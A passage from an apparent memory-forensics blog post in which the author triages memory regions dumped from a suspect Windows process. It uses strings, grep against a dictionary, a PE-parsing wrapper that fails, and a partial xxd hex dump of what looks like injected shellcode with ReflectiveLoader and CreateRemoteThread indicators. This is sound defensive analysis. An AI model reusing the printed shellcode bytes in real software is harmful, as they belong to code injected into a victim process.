word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">strings american-english | grep -v "'" > american-english.1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">strings -n4 american-english.1 > american-english</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The steps above copy the system's American English dictionary to the current directory, then removes lines from it containing apostrophes and then trims out words of less than four characters. Now that we have a reasonably good list of words, we can grep through our strings output for matches:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">grep -iFf american-english process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo > process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo.words</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Again, this is purely about data reduction. After this step, we're down to less than 4K words from nearly 17K strings at the start:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ wc -l *strings*</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><span class="Apple-converted-space"> </span>16942 process.0xfffffa8005138980.0xdc0000.dmp.strings</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><span class="Apple-converted-space"> </span>8540 process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><span class="Apple-converted-space"> </span>3797 process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo.words</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">Here are a few interesting strings from the <font face="courier">.words</font> file:</span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ grep Create *.words</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateEventA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateEventExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateFile2</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateFileA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateFileW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateMutexA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateRemoteThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateSemaphoreExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateSymbolicLinkW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateThreadpoolTimer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateThreadpoolWait</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>NtCreateSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>RtlCreateUserThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2<span class="Apple-converted-space"> </span>CreateToolhelp32Snapshot</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ grep Reflective *.words</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2<span class="Apple-converted-space"> </span>ReflectiveLoader</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ grep -i "\.dll" *.words</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CRYPT32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>kernel32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>KERNEL32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>USER32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>WININET.dll</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">Above are what appear to be function names and the names of some dlls, which may be imported. There are many strings related to SSL and TLS (not shown). Alas our use of <font face="courier">strings</font> is akin to groping around in the dark. We could proceed this way through the other files, but there are better tools for the job.</div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The prolific producer of prodigious probing programs, <a href="https://twitter.com/williballenthin" target="_blank">Willi Ballenthin</a>, has written a <a href="https://gist.github.com/williballenthin/cbc102d561e2eb647f7aec3c3753ba55" target="_blank">wrapper</a> around <a href="https://github.com/vivisect/vivisect" target="_blank">Vivisect</a> that can extract certain features from memory dumped <a href="https://docs.microsoft.com/en-us/previous-versions/ms809762(v=msdn.10)?redirectedfrom=MSDN" target="_blank">PE</a> files. Here's what </font><font face="courier">memdumppe.py</font><font face="inherit"> produces against the first dump:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xdc0000.dmp 0<span class="Apple-converted-space"> </span></font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Traceback (most recent call last):</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/bin/memdumppe.py", line 280, in <module></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>sys.exit(main())</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/bin/memdumppe.py", line 265, in main</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>pe = PE.PE(fv, inmem=guess_is_memory_image(fv))</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 377, in __init__</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>"pe.IMAGE_NT_HEADERS")</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 481, in readStructAtOffset</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>sbytes = self.readAtOffset(offset, len(s))</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 659, in readAtOffset</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>self.fd.seek(offset)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/bin/memdumppe.py", line 117, in seek</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raise IOError('cant read offset %d (overrun)' % (final_offset - self.start))</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IOError: cant read offset 738360417 (overrun)</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">Not entirely useful. Let's take a look at the file using <font face="courier">xxd</font>:</span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ xxd process.0xfffffa8005138980.0xdc0000.dmp</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000000: fc48 89ce 4881 ec00 2000 0048 83e4 f0e8<span class="Apple-converted-space"> </span>.H..H... ..H....</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000010: cc00 0000 4151 4150 5251 5648 31d2 6548<span class="Apple-converted-space"> </span>....AQAPRQVH1.eH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000020: 8b52 6048 8b52 1848 8b52 2048 8b72 5048<span class="Apple-converted-space"> </span>.R`H.R.H.R H.rPH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000030: 0fb7 4a4a 4d31 c948 31c0 ac3c 617c 022c<span class="Apple-converted-space"> </span>..JJM1.H1..<a|.,</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000040: 2041 c1c9 0d41 01c1 e2ed 5241 5148 8b52 <span class="Apple-converted-space"> </span>A...A....RAQH.R</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000050: 208b 423c 4801 d066 8178 180b 020f 8572 <span class="Apple-converted-space"> </span>.B<H..f.x.....r</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000060: 0000 008b 8088 0000 0048 85c0 7467 4801<span class="Apple-converted-space"> </span>.........H..tgH.</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000070: d050 8b48 1844 8b40 2049 01d0 e356 48ff<span class="Apple-converted-space"> </span>.P.H.D.@ I...VH.</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000080: c941 8b34 8848 01d6 4d31 c948 31c0 ac41<span class="Apple-converted-space"> </span>.A.4.H..M1.H1..A</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: 